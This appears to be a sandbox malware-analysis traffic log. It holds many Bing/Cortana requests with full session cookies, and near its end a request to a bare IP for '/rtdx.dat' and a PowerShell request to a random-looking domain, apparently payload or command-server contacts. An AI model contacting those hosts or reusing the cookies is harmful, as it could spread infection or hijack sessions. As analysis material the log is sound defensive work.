Source: global traffic	HTTP traffic detected: GET /rp/dXH4UJXiG6BhYx2KONGGI7yr8wE.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/dae1eD06shOtvLXODcWefBj-c4Q.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/eEeyUDaPc605RXeeN1fbn7yWGC0.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/fFuU75bKWQj9DW0kzRSK34dgJDs.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/gh1E-PD1FUxj3EMlkvob26q38Eo.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/ir34uLC35WF1sY2N-nv7lDNxLng.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /rp/scJcAyFqPgzn59HYTSkWVAJFy1I.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/tBpXlF3sjMQG5dYd3N9wm6DnoIE.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/upWrdqu_7mrk4ocj8g3Qd1zWots.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/v49fp2Yw7Bq2uOyij6jnzcM-RWo.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/wfEXc3aEPq6rcYq0ZJTmJluzF0M.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/xELyhdTL5JoMFvQXEqraw4oDUDA.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rs/2f/3h/cir3,ortl,cc,nc/HTtwxidvByGPeR1IbVBmzc6JMFE.css?or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rs/5V/YG/ortl,cc,nc/onra7PQl9o5bYT2lASI1BE4DDEs.css?or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rs/6o/fv/nj/aABLNT_FV45QjYQfnRHrBCAk4GU.js?or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /manifest/threshold.appcache HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initorigin: https://www.bing.comaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/hryYQjSSxM60EncpgnftvSF-LTo.js HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1760683970500&AC=4&CPH=3c5e799b; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe&LUT=1760683970495; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /manifest/threshold.appcache HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initorigin: https://www.bing.comaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1760683970834&AC=1&CPH=3c5e799b; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe&LUT=1760683970495; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rtdx.dat HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 141.98.80.175Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Host: xoiiasdpsdoasdpojas.comConnection: Keep-Alive

Source: chromecache_205.1.dr	String found in binary or memory: tag.src = "https://www.youtube.com/iframe_api"; equals www.youtube.com (Youtube)
Source: chromecache_189.1.dr	String found in binary or memory: <div class="rll-youtube-player" data-src="https://www.youtube.com/embed/7WY5eJ2A_3k" data-id="7WY5eJ2A_3k" data-query="feature=oembed" data-alt=""></div><noscript><iframe id="iframe-player-58" data-id="58" width="1140" height="641" src="https://www.youtube.com/embed/7WY5eJ2A_3k?feature=oembed" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe></noscript></div> equals www.youtube.com (Youtube)
Source: chromecache_189.1.dr	String found in binary or memory: <div class="rll-youtube-player" data-src="https://www.youtube.com/embed/ZmAIZd098o8" data-id="ZmAIZd098o8" data-query="feature=oembed" data-alt=""></div><noscript><iframe id="iframe-player-60" data-id="60" width="1140" height="641" src="https://www.youtube.com/embed/ZmAIZd098o8?feature=oembed" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe></noscript></div> equals www.youtube.com (Youtube)
Source: chromecache_189.1.dr	String found in binary or memory: <div class="mk-header-social toolbar-section"><ul><li><a class="facebook-hover " target="_blank" rel="noreferrer noopener" href="https://www.facebook.com/thefatshallot"><svg class="mk-svg-icon" data-name="mk-jupiter-icon-facebook" data-cacheid="icon-68f18a5806adf" style=" height:16px; width: 16px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M256-6.4c-141.385 0-256 114.615-256 256s114.615 256 256 256 256-114.615 256-256-114.615-256-256-256zm64.057 159.299h-49.041c-7.42 0-14.918 7.452-14.918 12.99v19.487h63.723c-2.081 28.41-6.407 64.679-6.407 64.679h-57.566v159.545h-63.929v-159.545h-32.756v-64.474h32.756v-33.53c0-8.098-1.706-62.336 70.46-62.336h57.678v63.183z"/></svg></i></a></li><li><a class="instagram-hover " target="_blank" rel="noreferrer noopener" href="https://www.instagram.com/thefatshallot"><svg class="mk-svg-icon" data-name="mk-jupiter-icon-instagram" data-cacheid="icon-68f18a5806ccb" style=" height:16px; width: 16px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M375.3,197.7L375.3,197.7c-0.6-11.5-2.2-20.4-5-27.1c-2.5-6.7-5.7-11.8-10.9-17c-5.9-5.5-10.5-8.4-16.9-10.9 